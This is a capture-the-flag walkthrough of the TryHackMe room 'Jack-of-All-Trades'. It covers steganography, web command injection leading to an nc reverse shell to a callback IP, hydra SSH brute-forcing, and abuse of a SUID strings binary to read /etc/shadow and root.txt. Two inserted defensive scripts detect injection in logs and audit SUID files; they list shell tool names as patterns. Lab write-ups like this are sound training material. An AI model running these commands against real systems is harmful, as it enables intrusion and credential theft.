Jack-of-All-Trades


Last updated 10 months ago

Room Link: https://tryhackme.com/room/jackofalltrades

Initial Scan

For some reason the services are swapped: the HTTP site is on port 22 and SSH is on port 80.

Kali

nmap -A $VICTIM

Scan all ports

No other open ports were found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/22 - HTTP

gobuster dir -u http://$VICTIM:22 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

I had to add the override to see the site on port 22 in Firefox.

There is a stegosaurus picture on the home page, hinting that something is hidden in one of the pictures (steganography). Eventually we find the jackinthebox username and password in one of them.

Kali

steghide extract -sf stego.jpg 
Password: u?WtKSraq

steghide extract -sf header.jpg  
Password: u?WtKSraq

The page does not render the output of a command like this, so you have to view the page source to see the results.

Browser

view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami

Kali

nc -lvnp 1337

Browser

view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337
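From the defender's side, requests like the two above leave an obvious trail in the web server's access log: a `cmd` parameter carrying a command name, and in the second case a callback IP and port. The following is an added example (not part of the room or the walkthrough) that parses Apache combined-format log lines, URL-decodes the query string, and scores requests whose parameter names are typically bound to a shell. The log lines are constructed: the `/nnxhweOV/index.php` path, the `cmd` parameter and the `10.10.154.80` callback address come from the walkthrough, the client IPs and timestamps are made up, and `SUSPECT_PARAMS` is an assumed starting list.

```python
"""Flag command-injection attempts against a shell-bound query parameter
in web server access logs.  Added example for this walkthrough; it is not
part of the TryHackMe room.  Sample log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample (Apache "combined" format).  The path, `cmd` parameter
# and callback address mirror the requests in the walkthrough; IPs and
# timestamps are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /nnxhweOV/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /nnxhweOV/index.php?cmd=whoami HTTP/1.1" 200 530 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:19 +0000] "GET /nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Request line inside a combined-format entry: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names commonly passed straight to a shell by vulnerable scripts (assumed list).
SUSPECT_PARAMS = {"cmd", "exec", "command", "run", "execute"}
# Shell metacharacters used to chain or substitute commands.
SHELL_META = re.compile(r"[;|&`$]")
# Names of shells and network/recon tools at a token boundary inside the value.
SHELL_TOOLS = re.compile(
    r"(^|[\s/;|&])(nc|ncat|netcat|sh|bash|dash|python\d?|perl|php|wget|curl|whoami|id|cat)(\s|$)"
)
# A dotted-quad in the value is a strong sign of a reverse-shell callback.
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def parse_line(line):
    """Parse one combined-format log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes values, so %20 becomes a space here.
    params = parse_qs(parts.query, keep_blank_values=True)
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "params": params, "status": int(m.group("status"))}


def score_request(entry):
    """Return (score, reasons) for a parsed entry; 0 when no suspect parameter is present."""
    reasons = []
    for name, values in entry["params"].items():
        if name.lower() not in SUSPECT_PARAMS:
            continue
        for value in values:
            reasons.append(f"suspect parameter {name}={value!r}")
            if SHELL_META.search(value):
                reasons.append("shell metacharacters in value")
            if SHELL_TOOLS.search(value):
                reasons.append("shell or network tool name in value")
            if IPV4.search(value):
                reasons.append("IP address in value (possible callback)")
    return len(reasons), reasons


def find_injection_attempts(log_text, min_score=1):
    """Return parsed entries whose score reaches min_score, each with its reasons attached."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        score, reasons = score_request(entry)
        if score >= min_score:
            hits.append({**entry, "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["path"], hit["score"], "; ".join(hit["reasons"]))
```

The scoring is deliberately additive rather than a single regex so that a bare `cmd=whoami` (score 2) is still surfaced but a value that also names a tool and carries a callback IP (score 3) sorts first. Because `parse_qs` decodes the query, the `%20`-encoded payload is matched on its decoded form, which is what a plain grep on the raw log would miss.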

Upgrade the shell to get autocomplete:

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

In the home directory there is a password list; it is small enough that I copied and pasted it into a file on Kali.

Kali

hydra -s 80 -l jack -P passwords.txt $VICTIM -t4 ssh

Kali

ssh jack@$VICTIM -p 80
Password: ITMJpGGIqg1jn?>@

PSPY

Kali

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32 
python2 -m SimpleHTTPServer 81

Victim

cd /tmp
wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32 

strings has the SUID bit set, which means we can run it against files we normally wouldn't be able to read. I tried cracking root's password but it was taking too long.

Victim

find / -perm -u=s -type f 2> /dev/null 
/usr/bin/strings /etc/shadow
/usr/bin/strings /etc/passwd
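The `find / -perm -u=s` output is only useful if you know which entries are normal. The following is an added example (not part of the room or any tool in it) that checks a list of SUID binaries against a baseline of binaries expected to be SUID on a stock Debian/Ubuntu install and explains why each leftover matters; it also includes a live scan equivalent of the find command. The sample find output is constructed to include the `/usr/bin/strings` finding from the walkthrough plus an invented out-of-tree entry, and `EXPECTED_SUID` and `FILE_READERS` are assumed starting lists, not authoritative ones.

```python
"""Audit SUID binaries against a baseline.  Added example for this
walkthrough, not part of the TryHackMe room.  The find output below is
constructed; the allowlist is an assumption for a stock Debian/Ubuntu host."""
import os
import stat

# Constructed sample of `find / -perm -u=s -type f 2>/dev/null` output: a typical
# stock set, plus the out-of-place strings binary from the room and an invented
# SUID file under /tmp.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/strings
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/tmp/.x/backup
"""

# Baseline of binaries expected to be SUID on a stock install (assumed list;
# derive the real baseline from a known-good image of your own build).
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/newgrp",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Programs that read or write arbitrary files, so SUID root on them exposes
# /etc/shadow and similar.  Short illustrative list.
FILE_READERS = {
    "strings", "cat", "head", "tail", "less", "more", "xxd", "base64", "cp", "mv",
    "vim", "vi", "nano", "python", "python3", "perl", "find", "tar", "zip",
}

SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib")


def audit_suid_list(paths, expected=EXPECTED_SUID):
    """Return [(path, reason)] for every SUID path not in the baseline."""
    findings = []
    for p in paths:
        p = p.strip()
        if not p or p in expected:
            continue
        name = os.path.basename(p)
        if name in FILE_READERS:
            reason = "can read/write arbitrary files as root"
        elif not p.startswith(SYSTEM_PREFIXES):
            reason = "SUID binary outside system directories"
        else:
            reason = "not in baseline"
        findings.append((p, reason))
    return findings


def scan_suid(root="/"):
    """Live equivalent of `find root -perm -u=s -type f`: regular files with the SUID bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable or vanished entry; skip like find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return sorted(hits)


if __name__ == "__main__":
    for path, reason in audit_suid_list(SAMPLE_FIND_OUTPUT.splitlines()):
        print(f"{path}: {reason}")
```

Run against a live host with `audit_suid_list(scan_suid())`. The fix for a finding like `/usr/bin/strings` is to clear the bit (`chmod u-s /usr/bin/strings`) and then to keep the baseline under configuration management so the next unexplained SUID file is caught on the next run rather than by an attacker.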

Kali

unshadow passwd shadow > passwords.txt 
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

I just ended up using strings to read root.txt.

Kali

/usr/bin/strings /root/root.txt

Room link: https://tryhackme.com/room/jackofalltrades